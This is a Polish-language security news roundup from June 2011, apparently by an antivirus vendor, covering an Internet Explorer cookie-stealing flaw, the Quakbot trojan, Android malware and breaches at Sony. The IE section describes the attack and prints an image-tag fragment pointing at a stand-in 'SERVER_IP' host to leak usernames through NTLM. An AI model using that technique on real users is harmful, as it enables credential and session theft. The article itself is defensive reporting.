W maju użytkownicy Internetu kolejny raz borykali się z rosnącą liczbą ataków poprzez wykorzystanie luk w dokumentach firmy Adobe. We wszystkich wersjach Internet Explorera, łącznie z IE9 została odnaleziona luka pozwalająca na kradzież niektórych informacji tekstowych wysyłanych przez serwer WWW i zapisywanych po stronie użytkownika (tzw. ciasteczka). Eksperci ArcaBit stwierdzili, iż zagrożenie jest istotne, gdyż pozwala m.in. na tzw. session hijacking, czyli przejęcie kontroli nad wymianą informacji w strumieniowym protokole TCP w sesji między dwoma komputerami. Zadanie włamania się przez lukę, którą prezentuje IE nie jest trudne, a głównym problemem jest odnalezienie dostępu do ścieżki systemowej dla ciasteczka. Dostęp opiera się przede wszystkim na nazwie użytkownika. Zmuszamy przeglądarkę do zwrócenia źródła w postaci < imgrc=\SERVER_IPimg.jpg > , co zainicjuje poprzez kryptograficzny protokół sieciowy NTLM negocjację z uwierzytelnianiem “wyzwanie-odpowiedź” i jako część tej negocjacji ujawni nazwę użytkownika w postaci prostego tekstu. W dalszej części ataku należy skłonić użytkownika do przesunięcia obiektu na ekranie. Ponieważ trudno jest zdalnie zmusić inną osobę do wykonania sprecyzowanych czynności, Microsoft zbagatelizował lukę jako trudną do wykorzystania. Niezależny ekspert IT Rosario Valotta udowodnił jednak, iż technicy Microsoft są w błędzie i na portalu Facebook stworzył erotyczną grę-puzzle, dzięki której uzyskał dostęp aż do 80 tysięcy plików cookies. W ten sam sposób przestępca może uzyskać wgląd do całej naszej sesji w przeglądarce.
    Kolejne, coraz mniej bagatelizowane zagrożenie stanowi Quakbot. To wielozadaniowy trojan, który pojawił się w Massachusetts w październiku 2010 roku i wykradł pełne dane osobowe 210 tysięcy bezrobotnych mieszkańców stanu. Jeszcze wtedy składał się z kilku komponentów, a każdy z nich pełnił określoną funkcję, takich jak: kradzież danych, rootkit (czyli ukrywanie informacji o swojej obecności), anty-emulacja, backdoor, oraz blokowanie dostępu do stron oferujących pomoc antywirusową. W marcu 2011 powrócił jako kod trzeciej generacji, a jego wszystkie procedury zostały upakowane w jednym pliku wykonywalnym, co pozwoliło mu na błyskawiczne rozprzestrzenianie się w sieciach korporacyjnych. W kwietniu i maju pojawił się w nowych wersjach po raz kolejny ze znacznie udoskonalonym i skróconym kodem, przy czym nie stracił żadnej ze swoich funkcjonalności. Chociaż według ekspertów trojan nie jest tak zaawansowany technologicznie jak Zeus, ewoluuje znacznie szybciej, co świadczy o jego wybitnej popularności wśród cyberprzestępców. Potwierdza to fakt, iż z jego pomocą z kont firmowych wielokrotnie zdefraudowano sumy nieosiągalne dla prywatnych użytkowników, a przecież głównie do tego typu kradzieży przystosowany był Zeus. Z każdym miesiącem notujemy setki nieznacznych modyfikacji Quakbota. Niepokojące jest też tempo jego rozprzestrzeniania. Nasi specjaliści ostrzegają iż w najbliższym czasie nowsze wersje mogą stać się popularne w Europie i mogą spowodować zamieszanie podobne do tego, które wznieciły na kontynencie Amerykańskim.
    W maju również użytkownicy telefonów komórkowych działających na systemie Android mogli się przekonać o aktywności przestępców. Szczególnie w Europie i Chinach, gdzie stale rośnie popularność wirusów atakujących aplikację Android. Podczas gdy w Chinach szaleje przenoszony za pomocą SMSa ANDROIDOS_TCENT.A, w Europie pojawił się równie groźny AndroidOS_LOTOOR.A, który pozwala przestępcom na  uzyskanie danych z telefonu, oraz zdalną zmianę ustawień przeznaczonych dla roota.
    Maj był też z pewnością jednym z najtrudniejszych miesięcy w historii firmy Sony. Wydaje się, iż po serii kwietniowych ataków, hakerzy nie zamierzają spocząć na laurach i dążą do całkowitego skompromitowania producenta konsol. Co więcej, cyberprzestępcy wydają się traktować nowe włamania jako ciekawe wyzwanie i prześcigają się w coraz to nowych i śmiałych próbach upokorzenia firmy. Już tylko w przeciągu ostatniego tygodnia Sony zostało zaatakowane pięciokrotnie, w tym również skutecznie poprzez nieskomplikowaną lukę SQL injection, co zaowocowało wyciekiem danych 10 tysięcy użytkowników. Firma Microsoft wydaje się uczyć na błędach konkurencji. Po ataku na ich produkt - Xbox Live, nie został złożony donos. Irlandzki nastolatek, który był autorem włamania nie doświadczył tak jak George Hotz porannego ataku policyjnych komandosów. Jest teraz szczęśliwym pracownikiem Microsoftu i współpracuje przy tworzeniu systemów bezpieczeństwa. Decyzja giganta z Redmond w tej sprawie została bardzo pozytywnie odebrana przez krytykę środowisk internetowych.

01.06.2011